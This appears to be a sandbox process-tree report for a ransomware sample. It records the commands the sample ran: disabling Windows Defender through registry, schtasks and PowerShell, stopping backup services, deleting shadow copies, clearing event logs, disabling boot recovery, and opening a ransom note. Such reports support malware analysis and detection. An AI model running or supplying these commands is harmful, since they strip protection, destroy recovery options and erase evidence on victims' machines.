44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 60 PID 840 wrote to memory of 1060 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 62
Processes
-
C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe"C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1504
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:816
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1388
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1792
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1096
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:828
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1244
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:388
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:952
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1936
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1556
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2004
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:916
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1060
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:988
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2000
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1620
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1264
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1492
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1488
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:240
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1792
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1760
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1064
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1292
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:992
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1376
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1748
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1976
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:852
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1844
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1312
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1160
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:620
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:816
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:280
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1304
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1268
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:792
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1864
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1392
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1740
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1164
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:456
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1504
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1280
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1700
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1100
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:976
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1336
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1348
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:828
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:880
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1116
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2120
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Zd66_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2352